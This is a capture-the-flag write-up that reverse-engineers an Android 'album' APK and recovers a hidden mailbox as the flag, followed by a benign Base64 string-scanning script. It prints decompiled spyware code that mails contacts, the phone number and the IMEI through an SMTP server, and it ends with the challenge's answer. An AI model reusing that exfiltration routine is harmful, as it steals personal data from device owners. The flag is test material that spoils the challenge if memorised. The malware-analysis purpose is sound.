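BUUCTF--相册 (Album)
Test file: https://www.lanzous.com/iaoj7qb
Tracing the code
Open the APK in jadx-gui and search for code containing "mail".
The sendMailByJavaMail function is clearly a key function. Navigate to its definition: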
public static int sendMailByJavaMail(String mailto, String title, String mailmsg) {
    if (!debug) {
        Mail m = new Mail(C0005C2.MAILUSER, C0005C2.MAILPASS);
        m.set_host(C0005C2.MAILHOST);
        m.set_port(C0005C2.PORT);
        m.set_debuggable(true);
        m.set_to(new String[]{mailto});
        m.set_from(C0005C2.MAILFROME);
        m.set_subject(title);
        m.setBody(mailmsg);
        try {
            if (m.send()) {
                Log.i("IcetestActivity", "Email was sent successfully.");
            } else {
                Log.i("IcetestActivity", "Email was sent failed.");
            }
        } catch (Exception e) {
            Log.e("MailApp", "Could not send email", e);
        }
    }
    return 1;
}
The function takes mailto as a parameter; this mailto value should be what we need to find.
Next, look for where this function is referenced:
public class MailTask extends AsyncTask<Integer, Integer, String> {
    private String content;
    private Context context;

    public void run(String content2) {
        // Join each NoteBook entry into one line of the form note[0]:note[1]
        String notebooks = "";
        for (String[] note : NoteBook.get(this.context, IMAPStore.RESPONSE)) {
            notebooks = String.valueOf(notebooks) + note[0] + ":" + note[1] + "\r\n";
        }
        String tel = ((TelephonyManager) this.context.getSystemService("phone")).getLine1Number();
        if (tel == null || tel.equals("")) {
            tel = C0001A2.getNoteBook(content2).phoneNumber;
        }
        Sms getBFlag = C0001A2.getNoteBook(content2);
        if (!C0001A2.isEmpty(notebooks)) {
            // Mails the collected entries to C0005C2.MAILSERVER; the subject literal "通讯录" means "contacts"
            C0001A2.sendMailByJavaMail(C0005C2.MAILSERVER, "通讯录(" + tel + "IMEI" + ((TelephonyManager) this.context.getSystemService("phone")).getDeviceId() + ")", notebooks);
        }
    }
    // (the excerpt ends here)
}
C0005C2.MAILSERVER is the mailbox we need, so trace it back to where it is defined:
public class C0005C2 {
    // Fields initialised with Base64.decode(NativeMethod.*()) take their values from the native library
    public static final String CANCELNUMBER = "%23%2321%23";
    public static final String MAILFROME = Base64.decode(NativeMethod.m1m());
    public static final String MAILHOST = "smtp.163.com";
    public static final String MAILPASS = Base64.decode(NativeMethod.pwd());
    public static final String MAILSERVER = Base64.decode(NativeMethod.m1m());
    public static final String MAILUSER = Base64.decode(NativeMethod.m1m());
    public static final String MOVENUMBER = "**21*121%23";
    public static final String PORT = "25";
    public static final String date = "2115-11-1";
    public static final String phoneNumber = Base64.decode(NativeMethod.m2p());
    // (the excerpt ends here)
}
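MAILSERVER is the value returned by NativeMethod.m1m(), a function in the externally loaded .so file, after Base64 decoding. So we only need to find the Base64-encoded string in the .so file.
Opening in IDA
After opening the libcore.so file from the APK in IDA, find the Base64-encoded strings in the String window.
After decoding them, the second one is the flag.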
get flag!
flag{18218465125@163.com}
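The string hunt done above in IDA's String window can also be scripted. The following is an added example, not part of the original write-up: it scans a binary blob for Base64-looking runs and keeps only those that decode to printable ASCII. The sample bytes, the JNI symbol name and both encoded values are constructed; the real input would be the bytes of libcore.so.

```python
import base64
import binascii
import re

# Runs of at least 8 Base64-alphabet bytes, optionally padded, as they
# appear among the printable strings of a native library.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{8,}={0,2}")


def decode_candidate(raw: bytes):
    """Return decoded text if raw is valid Base64 of printable ASCII, else None."""
    if len(raw) % 4 != 0:
        return None
    try:
        decoded = base64.b64decode(raw, validate=True)
    except (binascii.Error, ValueError):
        return None
    # Symbol names often fit the Base64 alphabet but decode to binary junk.
    if not decoded or any(b < 0x20 or b > 0x7E for b in decoded):
        return None
    return decoded.decode("ascii")


def find_base64_strings(blob: bytes):
    """Scan a binary blob and return (offset, encoded, decoded) tuples."""
    hits = []
    for match in B64_RUN.finditer(blob):
        text = decode_candidate(match.group())
        if text is not None:
            hits.append((match.start(), match.group().decode("ascii"), text))
    return hits


# Constructed sample standing in for the data section of a .so file.
SAMPLE = (
    b"\x7fELF\x01\x01\x00"
    + b"Java_com_example_NativeMethod_m1m\x00"   # constructed symbol name
    + base64.b64encode(b"collector@example.com") + b"\x00"
    + b"\x00\x10\x20"
    + base64.b64encode(b"13800000000") + b"\x00"
    + b"libc.so\x00"
)

if __name__ == "__main__":
    for offset, encoded, decoded in find_base64_strings(SAMPLE):
        print(f"0x{offset:04x}  {encoded}  ->  {decoded}")
```

To use it on the real library, read libcore.so with open(path, "rb").read() and pass the bytes to find_base64_strings.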